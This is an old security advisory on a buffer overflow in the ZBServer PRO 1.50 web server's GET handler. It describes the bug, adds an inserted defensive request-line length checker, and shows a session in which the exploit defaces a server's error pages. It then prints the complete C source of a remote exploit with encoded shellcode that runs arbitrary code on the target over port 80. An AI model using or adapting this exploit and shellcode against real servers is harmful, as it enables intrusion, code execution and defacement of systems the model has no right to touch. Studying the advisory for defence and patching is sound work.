Studying ZBServer 1.50-r1x overflow
             Advisory Name: ZBServer crash
         Advisory Released: [00/02/01]
               Application: personal web, ftp and gopher servers
                            on Win9x, WinNT
                  Severity: a local/remote user can run arbitrary code
                            with web server privileges.
                    Status: overflow discovered by USSRBACK
                            http://www.ussrback.com
                    Author: izan@galaxycorp.com
                       WWW: http://www.deepzone.org
                            http://mareasvivas.cjb.net



       OVERVIEW
       ZBServer PRO 1.50 (all releases) has a buffer overflow in its web
       server. Any local or remote user can run arbitrary code with web
       server privileges. The overflow was discovered by USSRBACK a few
       weeks ago; the original USSRBACK post contained no technical
       detail. The present document is a deeper study of that advisory,
       including the bug's impact.


       BACKGROUND
       Ideas and code were tested against Win9x and NT 4.0 SP5 (all
       Spanish versions). The ZBServer PRO version is 1.50. All releases
       are affected (r13 to r17).


       DETAILS
       ZBServer PRO's web server has an overflow in the GET command
       handler: it cannot handle an excessively long request. When the
       request string is about 766 bytes long the server crashes, because
       the stack has been overwritten.

       The vulnerability exists. USSRBACK's status (they discovered the
       bof) was originally:

       "Vendor Status: I emailed the vendor, and I don't have a response :("

       We have exploited it and finished our exploit for WinNT; it is
       attached to this advisory. Arbitrary code can run with web server
       privileges.

       The Win9x version cannot be exploited in a clean environment. If
       you have a default debugger configuration, or your processes are
       handled by a special process that hooks errors and exceptions, then
       it can be exploited too, but that will not be the common scenario.

       So the Win9x version cannot run arbitrary code in a clean
       environment, but a DoS attack is possible: you can crash the
       service with a local or remote request.
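The missing check behind the crash described above is a bound on the request target before it is copied into a fixed-size buffer. The following is an added example, not code from the advisory, from USSRBACK or from ZBServer: a bounded HTTP request-line checker that a server or an inline filter could apply to each request line before any copy takes place. The function names and the 512-byte limit (MAX_TARGET_LEN) are assumptions for the example; ZBServer's real buffer size is not public, the advisory only reports a crash near 766 bytes. The sample requests are constructed inline and mirror the shape of the crash request (a GET whose target is a long run of bytes).

```c
#include <stdio.h>
#include <string.h>

/* Assumed limit for this example; ZBServer's real buffer size is not
 * published, the advisory only reports a crash near 766 bytes. */
#define MAX_TARGET_LEN 512

enum req_verdict { REQ_OK = 0, REQ_MALFORMED = 1, REQ_TOO_LONG = 2, REQ_BINARY = 3 };

/* Check one HTTP request line (e.g. "GET /index.html HTTP/1.0") in place,
 * without copying it into any fixed-size buffer. 'len' is passed
 * explicitly so that an embedded NUL byte cannot cut the check short. */
enum req_verdict check_request_line(const unsigned char *line, size_t len,
                                    size_t max_target)
{
    size_t i = 0, start, tlen;

    /* Method: one or more uppercase letters, then a single space. */
    while (i < len && line[i] >= 'A' && line[i] <= 'Z')
        i++;
    if (i == 0 || i >= len || line[i] != ' ')
        return REQ_MALFORMED;
    start = ++i;

    /* Request target runs up to the next space or end of line. */
    while (i < len && line[i] != ' ' && line[i] != '\r' && line[i] != '\n')
        i++;
    tlen = i - start;
    if (tlen == 0 || line[start] != '/')
        return REQ_MALFORMED;

    /* Length first: this is the check whose absence lets a ~766-byte
     * request overwrite the stack. */
    if (tlen > max_target)
        return REQ_TOO_LONG;

    /* A URL path is printable ASCII; raw bytes such as a 0x90 NOP sled
     * or machine code have no business in it. */
    for (i = start; i < start + tlen; i++)
        if (line[i] < 0x21 || line[i] > 0x7e)
            return REQ_BINARY;

    return REQ_OK;
}

/* Constructed sample: a GET whose target is 'target_len' bytes ('/'
 * followed by 'fill' bytes), in the shape of the crash request, then
 * checked against MAX_TARGET_LEN. */
enum req_verdict check_filled_request(size_t target_len, unsigned char fill)
{
    static unsigned char buf[2048];
    size_t n = 0;

    if (target_len == 0 || 5 + target_len + 11 > sizeof buf)
        return REQ_MALFORMED;
    memcpy(buf, "GET /", 5);               n += 5;
    memset(buf + n, fill, target_len - 1); n += target_len - 1;
    memcpy(buf + n, " HTTP/1.0\r\n", 11);  n += 11;
    return check_request_line(buf, n, MAX_TARGET_LEN);
}

int main(void)
{
    static const char *name[] = { "ok", "malformed", "too long", "binary" };
    const char benign[] = "GET /index.html HTTP/1.0\r\n";

    printf("benign request:    %s\n",
           name[check_request_line((const unsigned char *)benign,
                                   sizeof benign - 1, MAX_TARGET_LEN)]);
    printf("766-byte target:   %s\n", name[check_filled_request(766, 'A')]);
    printf("64-byte NOP sled:  %s\n", name[check_filled_request(64, 0x90)]);
    return 0;
}
```

The length check is deliberately placed before the byte-content check: the first one is what prevents the overflow, the second only helps a log reviewer tell a stray long URL from a request carrying a payload.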


       EXPLOIT

       The ZBServer PRO 1.50-r1x exploit gets full control of the remote
       server. When you attack a vulnerable server you can run arbitrary
       code inside it. First, the exploit creates an advisory file; it is
       information for administrative use. Later, the exploit restores
       and kills the overflowed thread, but before that it patches some
       error information so that all error pages will appear as hacked
       pages.

       If you have problems running it against ZBServer they may be with
       your return address (remember that tests ran against the WinNT SP5
       Spanish version). I could jump via the edi register + 5 (more
       portable) but I would have a static DLL address dependence. Well,
       it wasn't a clear jump, so I decided to implement the first
       technique, but the second is possible too.

       Example session:



           % lynx http://xxx.xxx.xxx.xxx

           WELCOME TO ... blah ... blah ..... (It's the root page)

           % lynx xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html

           FILE NOT FOUND The request object (/ServerAbusedbyiZan.html) was
           not found.

           % lynx xxx.xxx.xxx.xxx/FileNotAvailable.html

           FILE NOT FOUND The request object (/FileNotAvailable.html) was not
           found.

           $ zbsploit xxx.xxx.xxx.xxx

           WinNT 4.0 sp5 ZBServer 1.50-r1x exploit http://mareasvivas.cjb.net -
           http://www.deepzone.org

           Coded by -=[|Zan]=- izan@galaxycorp.com - izan@deepzone.org

           done.

           $ lynx http://xxx.xxx.xxx.xxx

           WELCOME TO ... blah ... blah ..... (It's the root page again)

           % lynx http://xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html

               Hello. You are running a ZBServer PRO's buggy version and

                               you have been abused.

                       More information can be downloaded from

                   http://www.deepzone.org or http://mareasvivas.cjb.net

                regards to DeepZone crew (TheWizard, ^Anuska^ and Nemo)

                                  Coded by |Zan.



           % lynx xxx.xxx.xxx.xxx/FileNotAvailable.html

           Server hacked.

           http://www.deepzone.org Sploit coded by |Zan

           %_


                ................................................


/** slzbserv.c - local/remote exploit for ZBServer PRO 1.50-r1x (WinNT)
**
** ZBServer PRO 1.50-r1x exploit gets remote servers's full control.
** When you attacks a vulnerable server you can run abitrary code
** inside. Firstly, sploit creates an advisory file. It's information
** for administrative use. Later, exploit restores and kills
** overflowed thread but before it patchs some error information so
** all error pages will appear like hacked pages.
**
** Compile on Debian with kernel 2.2.12: gcc -o  slzbserv slzbserv.c
** run: ./slzbserv hostname
**
** http://mareasvivas.cjb.net / http://www.deepzone.org
**
** Coded by |Zan | izan@galaxycorp.com
**
**/


#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>     /* memcpy() */
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/errno.h>
#include <netdb.h>

#define _PORT   80      /* ZBServer's web server port */
#define _TamBuf 770     /* bytes of 'crash' sent: "GET /" plus the 765-byte payload */

char crash[] =
"GET /"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x81\xc7\xc8\x10\x10\x10\x81\xef\x10"
"\x10\x10\x10\x57\x5e\x33\xc0\x66\xb8\x31\x02\x90\x90\x50"
"\x59\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18"
"\x74\xb1\x89\xd9\x99\xf3\x99\xf1\x19\x99\x99\x99\xf3\x9b"
"\xf3\x99\xf3\x99\xf1\x99\x99\x99\xd9\x14\x2c\xac\x8b\xd9"
"\x99\xcf\xf1\x19\x02\xd4\x99\xc3\x66\x8b\xc9\xc2\xf3\x99"
"\x14\x24\x3a\x89\xd9\x99\xaa\x59\x32\x14\x2c\x3a\x89\xd9"
"\x99\xcf\xf1\xd3\x98\x99\x99\x09\x14\x2c\x72\x89\xd9\x99"
"\xcf\xca\xf1\x49\x05\xd4\x99\xc3\x66\x8b\xca\xf1\x05\x02"
"\xd4\x99\xc3\x66\x8b\xf1\xa9\xd4\xde\x99\xc6\x14\x2c\x3e"
"\x89\xd9\x99\xf3\xdd\x09\x09\x09\x09\xc0\x35\x33\x7b\x65"
"\xf3\x99\x23\x31\x02\xd4\x99\x66\x8b\x99\x99\x99\x99\xca"
"\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc\xfd\xb7\xa5"
"\xb6\xf1\xab\xa7\xf1\xed\xed\xe9\xa3\xb6\xb6\xee\xee\xee"
"\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xb9"
"\xb9\xca\xe9\xf5\xf6\xf0\xed\xb9\xfa\xf6\xfd\xfc\xfd\xb9"
"\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xe4\xa3\xb0\xa5\xf1\xed"
"\xf4\xf5\xa7\xa5\xf1\xfc\xf8\xfd\xa7\xa5\xed\xf0\xed\xf5"
"\xfc\xa7\xca\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc"
"\xfd\xb7\xa5\xb6\xed\xf0\xed\xf5\xfc\xa7\xa5\xb6\xf1\xfc"
"\xf8\xfd\xa7\xa5\xfb\xf6\xfd\xe0\xa7\xa5\xfa\xfc\xf7\xed"
"\xfc\xeb\xa7\xd1\xfc\xf5\xf5\xf6\xb7\xb9\xc0\xf6\xec\xb9"
"\xf8\xeb\xfc\xb9\xeb\xec\xf7\xf7\xf0\xf7\xfe\xb9\xf8\xb9"
"\xc3\xdb\xca\xfc\xeb\xef\xfc\xeb\xb9\xc9\xcb\xd6\xea\xb9"
"\xfb\xec\xfe\xfe\xe0\xb9\xef\xfc\xeb\xea\xf0\xf6\xf7\xb9"
"\xf8\xf7\xfd\xb9\xe0\xf6\xec\xb9\xf1\xf8\xef\xfc\xb9\xfb"
"\xfc\xfc\xf7\xb9\xf8\xfb\xec\xea\xfc\xfd\xb7\xa5\xe9\xa7"
"\xd4\xf6\xeb\xfc\xb9\xf0\xf7\xff\xf6\xeb\xf4\xf8\xed\xf0"
"\xf6\xf7\xb9\xfa\xf8\xf7\xb9\xfb\xfc\xb9\xfd\xf6\xee\xf7"
"\xf5\xf6\xf8\xfd\xb9\xff\xeb\xf6\xf4\xb9\xf1\xed\xed\xe9"
"\xa3\xb6\xb6\xee\xee\xee\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7"
"\xfc\xb7\xf6\xeb\xfe\xb9\xf6\xeb\xb9\xf1\xed\xed\xe9\xa3"
"\xb6\xb6\xf4\xf8\xeb\xfc\xf8\xea\xef\xf0\xef\xf8\xea\xb7"
"\xfa\xf3\xfb\xb7\xf7\xfc\xed\xa5\xe9\xa7\xeb\xfc\xfe\xf8"
"\xeb\xfd\xea\xb9\xed\xf6\xb9\xdd\xfc\xfc\xe9\xc3\xf6\xf7"
"\xfc\xb9\xfa\xeb\xfc\xee\xb9\xb1\xcd\xf1\xfc\xce\xf0\xe3"
"\xf8\xeb\xfd\xb5\xb9\xd8\xf7\xec\xea\xf2\xf8\xb9\xf8\xf7"
"\xfd\xb9\xd7\xfc\xf4\xf6\xb0\xa5\xe9\xa7\xda\xf6\xfd\xfc"
"\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb7\xa5\xb6\xfa\xfc"
"\xf7\xed\xfc\xeb\xa7\xa5\xb6\xfb\xf6\xfd\xe0\xa7\xa5\xb6"
"\xf1\xed\xf4\xf5\xa7\xb7\xc5\xf1\xed\xf4\xf5\xc5\xca\xfc"
"\xeb\xef\xfc\xeb\xd8\xfb\xec\xea\xfc\xfd\xfb\xe0\xf0\xc3"
"\xf8\xf7\xb7\xf1\xed\xf4\xf5\x99\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\xac\xe0\xe3\x01";


int     sock;
struct  sockaddr_in sock_a;
struct  hostent *host;

int main (int argc, char *argv[]) {

  printf("\nWinNT 4.0 sp5 ZBServer PRO 1.50-r1x exploit\n");
  printf("http://mareasvivas.cjb.net - http://www.deepzone.org\n\n");
  printf("Coded by -=[ |Zan ]=-  izan@galaxycorp.com - izan@deepzone.org\n\n");

  if(argc < 2) {
    fprintf(stderr, "Error : Usage: %s <hostname> \n", argv[0]);
    exit(0);
  }

  /* resolve the host name given on the command line */
  if((host=gethostbyname(argv[1])) == NULL) {
    perror("gethostbyname");
    exit(-1);
  }

  if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
    perror("create socket");
    exit(-1);
  }

  /* connect to the web server on port 80 */
  sock_a.sin_family=AF_INET;
  sock_a.sin_port=htons(_PORT);
  memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);
  if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) {
    perror("create connect");
    exit(-1);
  }

  fflush(stdout);

  /* send the 770-byte request line, then an empty line to end the request */
  write(sock,crash,_TamBuf);
  write(sock,"\n\n", 2);
  printf("done.\n\n");

  close(sock);
  return 0;
}